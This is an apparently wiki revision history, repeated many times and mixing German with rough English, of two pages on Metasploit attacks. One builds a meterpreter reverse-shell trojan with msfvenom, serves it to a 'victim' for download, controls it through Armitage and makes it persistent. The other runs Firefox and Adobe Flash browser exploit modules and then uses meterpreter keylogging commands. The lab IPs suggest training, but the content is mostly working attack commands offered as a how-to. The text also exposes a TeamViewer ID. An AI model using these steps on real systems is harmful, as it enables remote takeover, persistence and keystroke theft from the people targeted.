the target must be made to run the program we offer in this example simply the file as download to

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

on the target page

[[Datei:12 schadeware.png]]

=take control=

now we start metasploit and then armitage (left bar)

[[Datei:mframe.png]]

Preserve default setting Confirm further messages simply

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

When Armitage is started, we create a server to listen to
*payload
**windows
***metapreter

Here we adapt the LPORT

and wait for our target to connect

Now the target computer appears on the top right

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:30:58Z

Joshua.schreiner: /* defer the program to the target */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST is the computer that the client will connect later ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
the target must be made to run the program we offer in this example simply the file as download to

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

on the target page

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:28:40Z

Joshua.schreiner: /* defer the program to the target */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST is the computer that the client will connect later ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
the target must be made to run the program we offer in this example simply the file as download to

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:26:22Z

Joshua.schreiner: /* Create trojan */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST is the computer that the client will connect later ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:25:12Z

Joshua.schreiner:

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup target
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit browser Exlpoit

2019-09-02T10:23:44Z

Joshua.schreiner: /* method */

=Setup target=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
start metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup target

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
start metasploit console
*msfconsole
Selection of the exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
selection of malicious software
*set payload windows/meterpreter/reverse_tcp
put the localhost
*set lhost 192.168.244.50
putting the web server
*set srvhost 192.168.244.50
path to the hack
*set uripath /hack
execute the exploits
*exploit

=on the target=
*go up with win7 to http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
enter session
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T10:22:47Z

Joshua.schreiner: /* on the target */

=Setup target=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
start metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup target

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
start metasploit console
*msfconsole
Selection of the exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
selection of malicious software
*set payload windows/meterpreter/reverse_tcp
put the localhost
*set lhost 192.168.244.50
putting the web server
*set srvhost 192.168.244.50
path to the hack
*set uripath /hack
execute the exploits
*exploit

=on the target=
*go up with win7 to http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T10:20:00Z

Joshua.schreiner: /* on the console */

=Setup target=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
start metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup target

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
start metasploit console
*msfconsole
Selection of the exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
selection of malicious software
*set payload windows/meterpreter/reverse_tcp
put the localhost
*set lhost 192.168.244.50
putting the web server
*set srvhost 192.168.244.50
path to the hack
*set uripath /hack
execute the exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T10:16:40Z

Joshua.schreiner: /* Win7 32bit Exploit */

=Setup target=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
start metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup target

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T10:15:25Z

Joshua.schreiner: /* Action */

=Setup target=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
start metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit browser Exlpoit

2019-09-02T10:14:46Z

Joshua.schreiner: /* Setup Opfer */

=Setup target=
Winxp Service pack 3
Firefox 3.5

=Setup Hacker=
Kali Linux
ip: 192.168.242.53

=Action=
starte metasploit
msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

=Win7 32bit Exploit=
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html

* Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

==Hackersystem==
kali linux

ip 192.168.244.50

===on the console===
metasploit konsole starten
*msfconsole
auswahl des exploits
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
*set lhost 192.168.244.50
setzen des webservers
*set srvhost 192.168.244.50
pfad zum hack
*set uripath /hack
ausführen des exploits
*exploit

=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack

=on the hackersystem=
==commandos==
sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

==method==
session betreten
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
*meterpreter > ps

Metasploit & armitage trojaner

2019-09-02T10:04:32Z

Joshua.schreiner: /* kurz Beispiel keylogger */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup Opfer
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=short example keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:04:06Z

Joshua.schreiner: /* Was kann man machen */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup Opfer
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=What can you do=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=kurz Beispiel keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:03:37Z

Joshua.schreiner: /* Dauerhaft infizieren */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup Opfer
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Permanently infect=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=Was kann man machen=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=kurz Beispiel keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:02:46Z

Joshua.schreiner: /* Kontrolle übernehmen */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup Opfer
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=take control=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Dauerhaft infizieren=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=Was kann man machen=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=kurz Beispiel keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:02:01Z

Joshua.schreiner: /* dem opfer das Programm unterschieben */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup Opfer
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=defer the program to the target=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart

[[Datei:8 opfer.png]]

auf der opfer Seite

[[Datei:12 schadeware.png]]

=Kontrolle übernehmen=

nun starten wir erst metasploit und danach armitage (linke leiste)

[[Datei:mframe.png]]

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

[[Datei:amriamstarten.png]]

[[Datei:1armitagestarten.png]]

wenn armitage gestartet ist erstellen wir einen Server zum lauschen
*payload
**windows
***metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

=Dauerhaft infizieren=

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an

[[Datei:200persist.png]]

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

=Was kann man machen=
jetzt gibt es viele Möglichkeiten
*Rechtsklick infizierter pc
**meterpreter
***explore
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

=kurz Beispiel keylogger=

[[metasploit & armitage keylogger]]

Metasploit & armitage trojaner

2019-09-02T10:00:54Z

Joshua.schreiner: /* Trojaner erstellen */

Setup Hacker
Kali linux
ip: 192.168.242.91

Setup Opfer
Windows 7 Domain Rechner
Benutzer: Admin
ip: 192.168.242.76

=Create trojan=
*LHOST="10.81.1.1"
*LPORT="7777"
LHOST ist der Rechner den der Client spaeter connecten ...
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

[[Datei:7 trojaner.png]]

=dem opfer das Programm unterschieben=
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
